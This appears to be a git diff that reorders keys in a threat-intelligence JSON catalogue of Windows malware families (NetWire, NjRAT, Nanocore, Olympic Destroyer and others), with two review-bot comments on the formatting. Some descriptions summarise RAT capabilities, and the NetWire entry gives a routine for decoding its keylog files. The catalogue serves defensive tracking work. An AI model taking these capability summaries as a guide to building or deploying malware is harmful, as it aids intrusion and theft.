"https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", - "value": "MPKBot", - "description": "" + "value": "MPKBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", - "value": "Multigrain POS", - "description": "" + "value": "Multigrain POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", - "value": "murkytop", - "description": "" + "value": "murkytop" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", - "value": "Murofet", - "description": "" + "value": "Murofet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", "http://vms.drweb.ru/virus/?_is=1&i=8477920" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", - "value": "Mutabaha", - "description": "" + "value": "Mutabaha" }, { + "description": "", "meta": { - 
"synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", - "value": "MyKings Spreader", - "description": "" + "value": "MyKings Spreader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", - "value": "MyloBot", - "description": "" + "value": "MyloBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", - "value": "N40", - "description": "" + "value": "N40" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", - "value": "Nabucur", - "description": "" + "value": "Nabucur" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", - "value": "Nagini", - "description": "" + "value": "Nagini" }, { + "description": "", 
"meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", - "value": "Naikon", - "description": "" + "value": "Naikon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", - "value": "Nanocore RAT", - "description": "" + "value": "Nanocore RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", - "value": "NanoLocker", - "description": "" + "value": "NanoLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", - "value": "Narilam", - "description": "" + "value": "Narilam" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] + ], + "synonyms": [], + 
"type": [] }, "uuid": "d8295eba-60ef-4900-8091-d694180de565", - "value": "Nautilus", - "description": "" + "value": "Nautilus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", - "value": "NavRAT", - "description": "" + "value": "NavRAT" }, { + "description": "", "meta": { - "synonyms": [ - "nucurs" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", 
@@ -10111,105 +10111,105 @@
 "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
 "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
 "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/"
- ]
+ ],
+ "synonyms": [
+ "nucurs"
+ ],
+ "type": []
 },
 "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
- "value": "Necurs",
- "description": ""
+ "value": "Necurs"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Nemain"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim",
 "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf"
- ]
+ ],
+ "synonyms": [
+ "Nemain"
+ ],
+ "type": []
 },
 "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428",
- "value": "Nemim",
- "description": ""
+ "value": "Nemim"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc",
 "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5",
- "value": "NetC",
- "description": ""
+ "value": "NetC"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "ScoutEagle"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
- ]
+ ],
+ "synonyms": [
+ "ScoutEagle"
+ ],
+ "type": []
 },
 "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
- "value": "NETEAGLE",
- "description": ""
+ "value": "NETEAGLE"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger",
 "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333",
- "value": "Netrepser",
- "description": ""
+ "value": "Netrepser"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat",
 "http://www.netsupportmanager.com/index.asp",
 "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
 "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "42562c47-08e1-46bc-962c-28d1831d092b",
- "value": "NetSupportManager RAT",
- "description": ""
+ "value": "NetSupportManager RAT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "TravNet"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler",
 "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
 "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf"
- ]
+ ],
+ "synonyms": [
+ "TravNet"
+ ],
+ "type": []
 },
 "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928",
- "value": "NetTraveler",
- "description": ""
+ "value": "NetTraveler"
 },
 {
+ "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n",
 "meta": {
- "synonyms": [
- "Recam"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
 "https://www.circl.lu/pub/tr-23/",
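Review bot: Every `+ "description": ""` line this hunk adds (the same pattern recurs in the hunks at 10217, 10253 and 10411) keeps an empty string as the "no description" sentinel, which a consumer cannot tell apart from a deliberately blank text. A key-normalisation pass is the natural point either to drop the key for such entries or to state in the commit message that the cluster schema requires it, so the choice is explicit rather than inherited. The NetWire entry that opens at the end of this hunk continues outside it.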
@@ -10217,31 +10217,31 @@
 "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
 "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
 "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html"
- ]
+ ],
+ "synonyms": [
+ "Recam"
+ ],
+ "type": []
 },
 "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740",
- "value": "NetWire RC",
- "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n"
+ "value": "NetWire RC"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron",
 "https://www.ncsc.gov.uk/alerts/turla-group-malware"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9",
- "value": "Neuron",
- "description": ""
+ "value": "Neuron"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Kasidet"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino",
 "http://securitykitten.github.io/an-evening-with-n3utrino/",
@@ -10253,157 +10253,157 @@
 "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex",
 "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
 "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/"
- ]
+ ],
+ "synonyms": [
+ "Kasidet"
+ ],
+ "type": []
 },
 "uuid": "3760920e-4d1a-40d8-9e60-508079499076",
- "value": "Neutrino",
- "description": ""
+ "value": "Neutrino"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Jimmy"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos",
 "https://securelist.com/neutrino-modification-for-pos-terminals/78839/",
 "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
- ]
+ ],
+ "synonyms": [
+ "Jimmy"
+ ],
+ "type": []
 },
 "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d",
- "value": "Neutrino POS",
- "description": ""
+ "value": "Neutrino POS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat",
 "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8",
- "value": "NewCore RAT",
- "description": ""
+ "value": "NewCore RAT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings",
 "https://asert.arbornetworks.com/lets-talk-about-newposthings/",
 "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/",
 "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411",
- "value": "NewPosThings",
- "description": ""
+ "value": "NewPosThings"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels",
 "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c",
- "value": "NewsReels",
- "description": ""
+ "value": "NewsReels"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "CT"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct",
 "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
- ]
+ ],
+ "synonyms": [
+ "CT"
+ ],
+ "type": []
 },
 "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421",
- "value": "NewCT",
- "description": ""
+ "value": "NewCT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot",
 "https://twitter.com/benkow_/status/789006720668405760"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697",
- "value": "Nexster Bot",
- "description": ""
+ "value": "Nexster Bot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger",
 "https://twitter.com/PhysicalDrive0/status/842853292124360706",
 "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51",
- "value": "NexusLogger",
- "description": ""
+ "value": "NexusLogger"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb",
 "https://research.checkpoint.com/ramnits-network-proxy-servers/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e",
- "value": "Ngioweb",
- "description": ""
+ "value": "Ngioweb"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove",
 "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130",
- "value": "nitlove",
- "description": ""
+ "value": "nitlove"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5",
- "value": "Nitol",
- "description": ""
+ "value": "Nitol"
 },
 {
+ "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.",
 "meta": {
- "synonyms": [
- "Bladabindi"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat",
 "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
@@ -10411,126 +10411,128 @@
 "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
- ]
+ ],
+ "synonyms": [
+ "Bladabindi"
+ ],
+ "type": []
 },
 "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
- "value": "NjRAT",
- "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored."
+ "value": "NjRAT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer",
 "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a",
- "value": "Nocturnal Stealer",
- "description": ""
+ "value": "Nocturnal Stealer"
 },
 {
+ "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki",
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/",
 "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124",
- "value": "Nokki",
- "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37."
+ "value": "Nokki"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "6207668d-af17-44a6-97a2-e1b448264529",
- "value": "Nozelesn (Decryptor)",
- "description": ""
+ "value": "Nozelesn (Decryptor)"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom",
 "https://twitter.com/malwrhunterteam/status/910952333084971008",
 "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
 "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de",
- "value": "nRansom",
- "description": ""
+ "value": "nRansom"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "nymain"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
 "https://www.cert.pl/en/news/single/nymaim-revisited/",
 "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
 "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
 "https://bitbucket.org/daniel_plohmann/idapatchwork"
- ]
+ ],
+ "synonyms": [
+ "nymain"
+ ],
+ "type": []
 },
 "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937",
- "value": "Nymaim",
- "description": ""
+ "value": "Nymaim"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2",
 "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da",
- "value": "Nymaim2",
- "description": ""
+ "value": "Nymaim2"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2",
- "value": "OddJob",
- "description": ""
+ "value": "OddJob"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff",
 "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "045df65f-77fe-4880-af34-62ca33936c6e",
- "value": "Odinaff",
- "description": ""
+ "value": "Odinaff"
 },
 {
+ "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer",
 "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
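Review bot: The Nokki `description` line moved to the top of its entry still reads `"Nokki is a RAT type malware which is believe to evolve from Konni RAT. ..."`; since the commit rewrites that line anyway, the wording should be corrected to `which is believed to have evolved from Konni RAT` rather than carried over verbatim. The rest of the hunk only reorders keys into the same description/meta/uuid/value order the neighbouring hunks use, so no value changes. The Olympic Destroyer entry that opens at the end of this hunk continues outside it.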
@@ -10541,243 +10543,241 @@ "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", - "value": "Olympic Destroyer", - "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." + "value": "Olympic Destroyer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker", - "description": "" + "value": "OneKeyLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82733125-da67-44ff-b2ac-b16226088211", - "value": "ONHAT", - "description": "" + "value": "ONHAT" }, { + "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. 
", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", "https://www.f-secure.com/weblog/archives/00002764.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", - "value": "OnionDuke", - "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " + "value": "OnionDuke" }, { + "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + ], "synonyms": [ "SBot", "Onliner" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" - ] + "type": [] }, "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", - "value": "OnlinerSpambot", - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." 
+ "value": "OnlinerSpambot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", - "value": "OopsIE", - "description": "" + "value": "OopsIE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", "https://forum.malekal.com/viewtopic.php?t=21806" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", - "value": "Opachki", - "description": "" + "value": "Opachki" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", - "value": "OpGhoul", - "description": "" + "value": "OpGhoul" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", - "value": 